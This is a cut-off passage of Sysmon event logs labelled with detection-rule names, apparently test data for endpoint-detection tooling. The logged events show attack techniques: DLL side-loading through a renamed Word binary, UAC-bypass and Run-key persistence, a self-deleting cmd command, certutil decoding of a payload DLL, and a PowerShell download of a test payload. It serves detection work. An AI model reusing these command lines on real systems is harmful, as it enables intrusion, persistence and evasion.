Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\apt\\wwlib\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020100A0A00","LogonId":"0xa0a10","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-CA8F-5F8A-0000-001025020B00","ParentProcessId":5104,"ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:27.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417068,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:27.499490Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417069,"Execution_attributes":{"ProcessID":3500,"ThreadID":4704},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:28.429353Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417070,"Execution_attributes":{"ProcessID":3500,"ThreadID":4704},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:28.429717Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}","ParentImage":"C:\\Windows\\SysWOW64\\dllhost.exe","ParentProcessGuid":"747F3D96-D8E2-5F8A-0000-0010F28A7200","ParentProcessId":8500,"ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:31.478"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417071,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.484036Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417072,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.627786Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417073,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.628328Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417074,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:33.449476Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417075,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:33.476471Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8E8-5F8A-0000-00102CEF7200","ProcessId":840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:36.303"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417079,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:36.306601Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\explorer.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=60E3F357B06AF9EB84FB9019BF08FB4DD109D4EC,MD5=AA0CA518E66F290FE0BAC6169473E8A9,SHA256=0D7CB0B75CD61CDFFE0E53910829FFA5C02C8759EBD27A49E2EF7A907A10E506,IMPHASH=FBEBD61CE702929C1F33B522FD572C5D","Image":"C:\\Windows\\SysWOW64\\explorer.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8EC-5F8A-0000-001094207300","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:40.835"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417081,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:40.902894Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F1-5F8A-0000-00108B4B7300","ProcessId":1576,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:45.116"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417083,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:45.120170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c ping 127.0.0.1&&del del /F /Q /A:H \"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A","Image":"C:\\Windows\\SysWOW64\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F5-5F8A-0000-00106B6F7300","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:49.217"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417085,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:49.229742Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:25.868","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-7ACC-5CC4-0000-0010B2470300","ProcessId":2772,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","UtcTime":"2019-04-27 15:57:25.868"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6575,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:25.868863Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6579,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmartMax.dll","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6581,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Roaming\\svchost.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-0010F9530C00","ProcessId":2992,"RuleName":"technique_id=T1060,technique_name=Registry Run Keys / Start Folder","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\360v","UtcTime":"2019-04-27 15:57:53.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6593,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.884488Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ProcessId":3184,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:32:58.614"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4888,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:32:58.659405Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ParentProcessId":3184,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010FFF28500","ProcessId":700,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:32:58.940"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4890,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:32:59.234755Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 